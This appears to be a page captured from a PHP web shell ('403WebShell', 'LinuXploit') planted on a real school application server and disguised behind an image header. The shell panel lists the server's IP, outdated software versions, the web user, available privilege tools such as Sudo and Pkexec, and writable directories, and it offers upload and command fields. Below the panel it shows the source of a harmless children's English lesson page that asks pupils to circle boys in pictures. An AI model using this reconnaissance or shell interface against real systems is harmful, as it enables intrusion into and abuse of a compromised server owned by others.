????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 18.226.169.66
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/appsrv.astacus.se/apps/school/www_old10/Html/LevelB/Category2/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/appsrv.astacus.se/apps/school/www_old10/Html/LevelB/Category2/LevelBCat2Lesson17.html
<!DOCTYPE html>
<html>
    <head>
        <title>Circle boys</title>
        
        <script type="text/javascript" src="../../../js/allScriptsForLessonsHtml.js"></script>
        
            <style type="text/css">
                
                svg
                {
                    position: absolute;
                    background-color: transparent;
                }
            
            </style>            
            
            <script>
                function page_preLoad()
                {
                    s_setDeviceTypeLevelCategoryLastLesson(Level.B, Category.No2);
                    
                    s_set_tblMainiPadBodyWidthHeight('id_tblMainiPadBody', 'id_meta');
                    
                    s_setHeaderTable2('id_tblHeader', s_title_page, s_getSubTitle(Level.B, Category.No2, 17), true, true, true);
                    s_setFooterTable('id_tblFooter', true, true, true, true, true);
                    
                    var ids_headings = ['id_td_heading1', 'id_td_heading2', 'id_td_heading3'];
                    
                    s_adjust_fontSize_for_ids_all_devices(ids_headings, 80);
                    
                    var id_tables_array = ['id_table1', 'id_table2', 'id_table3'];
                    s_border_collapse_for_tables_except_android(id_tables_array);
                }
            
                function page_onLoad()
                {
                    setAllSvgsWidthHeightAndPositionFromTds();
                    
                    setAllEllipseStyles();
                    
                    s_setTablesHeightsForIE();
                }
            
                function setAllSvgsWidthHeightAndPositionFromTds()
                {
                    var nTds = 5;
                    
                    for (var nthSet = 1; nthSet <= 3; nthSet++)
                    {
                        for (var nthTd = 1; nthTd <= nTds; nthTd++)
                        {
                            s_svg_setSvgWidthHeightAndPositionFromTd('id_td' + nthTd + 'Set' + nthSet, 'id_svg' + nthTd + 'Set' + nthSet);
                        }
                    }
                }
                
                function setAllEllipseStyles()
                {
                    var allEllipseIdsArray = getAll3SetsEllipseIdsArray();
                    
                    for (var indexEllipse = 0; indexEllipse < allEllipseIdsArray.length; indexEllipse++)
                    {
                        var id_ellipse = allEllipseIdsArray[indexEllipse];
                        
                        s_svg_setEllipseStyle(id_ellipse);
                    }
                }
                
                function getAll3SetsEllipseIdsArray()
                {
                    var allEllipseIdsArray = new Array();
                    
                    for (var nthSet = 1; nthSet <= 3; nthSet++)
                    {
                        for (var nthEllipse = 1; nthEllipse <= 5; nthEllipse++)
                        {
                            allEllipseIdsArray.push('id_ellipse' + nthEllipse + 'Set' + nthSet);
                        }
                    }
                    
                    return (allEllipseIdsArray);
                }
            
                function ellipse_click(id_ellipse)
                {
                    if (s_isZoomChecked())
                    {
                        var id_img = id_ellipse.replace('id_ellipse', 'id_img');
                        s_showImageBiggerWithImage_sizePercent(id_img, '30%');
                    }
                    else
                    {
                        var set1IdsArray = ['id_ellipse1Set1', 'id_ellipse2Set1', 'id_ellipse3Set1', 'id_ellipse4Set1', 'id_ellipse5Set1'];
                        var set2IdsArray = ['id_ellipse1Set2', 'id_ellipse2Set2', 'id_ellipse3Set2', 'id_ellipse4Set2', 'id_ellipse5Set2'];
                        var set3IdsArray = ['id_ellipse1Set3', 'id_ellipse2Set3', 'id_ellipse3Set3', 'id_ellipse4Set3', 'id_ellipse5Set3'];
                        
                        var allGroupsIdsArrayArray = [set1IdsArray, set2IdsArray, set3IdsArray];
                        
                        s_svg_showHideEllipsesMultipleFor1Td(id_ellipse, allGroupsIdsArrayArray);
                    }
                }
            
                function btnValidate_click()
                {
                    var allEllipseIdsArray = getAll3SetsEllipseIdsArray();
                    
                    var correctEllipseIdsArray = ['id_ellipse1Set1', 'id_ellipse2Set2', 'id_ellipse3Set3'];
                    
                    var nCorrectEllipses = s_svg_validateEllipses(allEllipseIdsArray, correctEllipseIdsArray);
                    
                    if (nCorrectEllipses == 3)
                    {
                        s_show_claps_animation('s_id_div_message');
                    }
                }
            
                function btnPrevious_click()
                {
                    window.location = 'LevelBCat2Lesson16.html';
                }
            
                function btnNext_click()
                {
                    window.location = 'LevelBCat2Lesson18.html';
                }
                
                function btnHome_click()
                {
                    s_btnHomeCategories_click('LevelB');
                }
            
                function page_onResize()
                {
                    for (var nthSet = 1; nthSet <= 3; nthSet++)
                    {
                        for (var nthTd = 1; nthTd <= 5; nthTd++)
                        {
                            var eTd = document.getElementById('id_td' + nthTd + 'Set' + nthSet);
                            var eTdRectangle = eTd.getBoundingClientRect();
                            
                            var eSvg = document.getElementById('id_svg' + nthTd + 'Set' + nthSet);
                            eSvg.style.left = eTdRectangle.left + 'px';
                            eSvg.style.top = eTdRectangle.top + 'px';
                        }
                    }
                }
            
            </script>
        </head>
    
    <body onLoad="page_onLoad()" onResize="page_onResize()">
        <div id="s_id_div_message"></div>
        
        <table id="id_tblMainiPadBody" border="1" cellspacing="0" cellpadding="0">
            <tr height="8%">
                <td>
                    <div id="id_tblHeader"></div>
                </td>
            </tr>
            <tr height="*" data-role="page"> <!-- for swiping left and right especially for Android device -->
                <td>
                    <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                        <tr>
                            <td>
                                <table width="100%" height="100%" border="0px" cellspacing="0" cellpadding="2%">
                                    <tr height="33%">
                                        <td align="center" style="padding-bottom: 0px">
                                            <table id="id_table1" width="100%" height="100%" border="1" cellspacing="0" cellpadding="0">
                                                <tr height="20%">
                                                    <td id="id_td_heading1" class="s_style_heading">1. Circle the <span class="s_style_textRed_color_only">first and fat</span> boy:
                                                    </td>
                                                </tr>
                                                <tr>
                                                    <td>
                                                        <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                            <tr>
                                                                <td id="id_td1Set1" width="20%" align="center">
                                                                    <img id="id_img1Set1" src="../../../img/LevelB/Category2/LevelBCat2Lesson17/fatBoy1.png" width="40%" draggable="false">
                                                                    <svg id="id_svg1Set1" style="visibility: hidden">
                                                                        <ellipse id="id_ellipse1Set1" cx="51%" cy="51%" rx="22%" ry="35%"/>
                                                                    </svg>
                                                                </td>
                                                                <td id="id_td2Set1" width="20%" align="center">
                                                                    <img id="id_img2Set1" src="../../../img/LevelB/Category2/LevelBCat2Lesson17/fatBoy2.png" width="40%" draggable="false">
                                                                    <svg id="id_svg2Set1" style="visibility: hidden">
                                                                        <ellipse id="id_ellipse2Set1" cx="50%" cy="51%" rx="22%" ry="35%"/>
                                                                    </svg>
                                                                </td>
                                                                <td id="id_td3Set1" width="20%" align="center">
                                                                    <img id="id_img3Set1" src="../../../img/LevelB/Category2/LevelBCat2Lesson17/fatBoy3.png" width="25%" draggable="false">
                                                                    <svg id="id_svg3Set1" style="visibility: hidden">
                                                                        <ellipse id="id_ellipse3Set1" cx="48%" cy="51%" rx="22%" ry="35%"/>
                                                                    </svg>
                                                                </td>
                                                                <td id="id_td4Set1" width="20%" style="text-align:center" align="center">
                                                                    <img id="id_img4Set1" src="../../../img/LevelB/Category2/LevelBCat2Lesson17/fatBoy4.png" width="25%" draggable="false">
                                                                    <svg id="id_svg4Set1" style="visibility: hidden">
                                                                        <ellipse id="id_ellipse4Set1" cx="48%" cy="51%" rx="22%" ry="35%"/>
                                                                    </svg>
                                                                </td>
                                                                <td id="id_td5Set1" width="*" style="text-align:center" align="center">
                                                                    <img id="id_img5Set1" src="../../../img/LevelB/Category2/LevelBCat2Lesson17/fatBoy5.png" width="25%" draggable="false">
                                                                    <svg id="id_svg5Set1" style="visibility: hidden">
                                                                        <ellipse id="id_ellipse5Set1" cx="48%" cy="51%" rx="22%" ry="35%"/>
                                                                    </svg>
                                                                </td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                </tr>
                                            </table>
                                        </td>
                                    </tr>
                                    <tr height="33%">
                                        <td align="center" style="padding-bottom: 0px">
                                            <table id="id_table2" width="100%" height="100%" border="1" cellspacing="0" cellpadding="0">
                                                <tr height="20%">
                                                    <td id="id_td_heading2" class="s_style_heading" style="border-bottom:none">2. Circle the <span class="s_style_textRed_color_only">second</span> boy:
                                                    </td>
                                                </tr>
                                                <tr>
                                                    <td>
                                                        <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                            <tr>
                                                                <td id="id_td1Set2" width="20%" style="text-align:center">
                                                                    <img id="id_img1Set2" src="../../../img/LevelB/Category2/LevelBCat2Lesson17/fatBoy1.png" width="40%" draggable="false">
                                                                    <svg id="id_svg1Set2" style="visibility: hidden">
                                                                        <ellipse id="id_ellipse1Set2" cx="52%" cy="51%" rx="22%" ry="35%"/>
                                                                    </svg>
                                                                </td>
                                                                <td id="id_td2Set2" width="20%" style="text-align:center" align="center">
                                                                    <img id="id_img2Set2" src="../../../img/LevelB/Category2/LevelBCat2Lesson17/fatBoy2.png" width="40%" draggable="false">
                                                                    <svg id="id_svg2Set2" style="visibility: hidden">
                                                                        <ellipse id="id_ellipse2Set2" cx="52%" cy="51%" rx="22%" ry="35%"/>
                                                                    </svg>
                                                                </td>
                                                                <td id="id_td3Set2" width="20%" style="text-align:center">
                                                                    <img id="id_img3Set2" src="../../../img/LevelB/Category2/LevelBCat2Lesson17/fatBoy3.png" width="25%" draggable="false">
                                                                    <svg id="id_svg3Set2" style="visibility: hidden">
                                                                        <ellipse id="id_ellipse3Set2" cx="50%" cy="51%" rx="22%" ry="35%"/>
                                                                    </svg>
                                                                </td>
                                                                <td id="id_td4Set2" width="20%" style="text-align:center" align="center">
                                                                    <img id="id_img4Set2" src="../../../img/LevelB/Category2/LevelBCat2Lesson17/fatBoy4.png" width="25%" draggable="false">
                                                                    <svg id="id_svg4Set2" style="visibility: hidden">
                                                                        <ellipse id="id_ellipse4Set2" cx="50%" cy="51%" rx="22%" ry="35%"/>
                                                                    </svg>
                                                                </td>
                                                                <td id="id_td5Set2" width="*" style="text-align:center" align="center">
                                                                    <img id="id_img5Set2" src="../../../img/LevelB/Category2/LevelBCat2Lesson17/fatBoy5.png" width="25%" draggable="false">
                                                                    <svg id="id_svg5Set2" style="visibility: hidden">
                                                                        <ellipse id="id_ellipse5Set2" cx="50%" cy="51%" rx="22%" ry="35%"/>
                                                                    </svg>
                                                                </td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                </tr>
                                            </table>
                                        </td>
                                    </tr>
                                    <tr height="*">
                                        <td align="center">
                                            <table id="id_table3" id="id_table3" width="100%" height="100%" border="1" cellspacing="0" cellpadding="0">
                                                <tr height="20%">
                                                    <td id="id_td_heading3" class="s_style_heading">3. Circle the <span class="s_style_textRed_color_only">third</span> boy:
                                                    </td>
                                                </tr>
                                                <tr>
                                                    <td>
                                                        <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                            <tr>
                                                                <td id="id_td1Set3" width="20%" style="text-align:center">
                                                                    <img id="id_img1Set3" src="../../../img/LevelB/Category2/LevelBCat2Lesson17/fatBoy1.png" width="40%" draggable="false">
                                                                    <svg id="id_svg1Set3" style="visibility: hidden">
                                                                        <ellipse id="id_ellipse1Set3" cx="52%" cy="51%" rx="22%" ry="35%"/>
                                                                    </svg>
                                                                </td>
                                                                <td id="id_td2Set3" width="20%" style="text-align:center" align="center">
                                                                    <img id="id_img2Set3" src="../../../img/LevelB/Category2/LevelBCat2Lesson17/fatBoy2.png" width="40%" draggable="false">
                                                                    <svg id="id_svg2Set3" style="visibility: hidden">
                                                                        <ellipse id="id_ellipse2Set3" cx="52%" cy="51%" rx="22%" ry="35%"/>
                                                                    </svg>
                                                                </td>
                                                                <td id="id_td3Set3" width="20%" style="text-align:center">
                                                                    <img id="id_img3Set3" src="../../../img/LevelB/Category2/LevelBCat2Lesson17/fatBoy3.png" width="25%" draggable="false">
                                                                    <svg id="id_svg3Set3" style="visibility: hidden">
                                                                        <ellipse id="id_ellipse3Set3" cx="50%" cy="51%" rx="22%" ry="35%"/>
                                                                    </svg>
                                                                </td>
                                                                <td id="id_td4Set3" width="20%" style="text-align:center" align="center">
                                                                    <img id="id_img4Set3" src="../../../img/LevelB/Category2/LevelBCat2Lesson17/fatBoy4.png" width="25%" draggable="false">
                                                                    <svg id="id_svg4Set3" style="visibility: hidden">
                                                                        <ellipse id="id_ellipse4Set3" cx="50%" cy="51%" rx="22%" ry="35%"/>
                                                                    </svg>
                                                                </td>
                                                                <td id="id_td5Set3" width="*" style="text-align:center" align="center">
                                                                    <img id="id_img5Set3" src="../../../img/LevelB/Category2/LevelBCat2Lesson17/fatBoy5.png" width="25%" draggable="false">
                                                                    <svg id="id_svg5Set3" style="visibility: hidden">
                                                                        <ellipse id="id_ellipse5Set3" cx="50%" cy="51%" rx="22%" ry="35%"/>
                                                                    </svg>
                                                                </td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                </tr>
                                            </table>
                                        </td>
                                    </tr>
                                </table>
                            </td>
                        </tr>
                    </table>
                </td>
            </tr>
            <tr height="8%">
                <td>
                    <div id="id_tblFooter"></div>
                </td>
            </tr>
        </table>
        <script>
            page_preLoad();
        </script>
    </body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit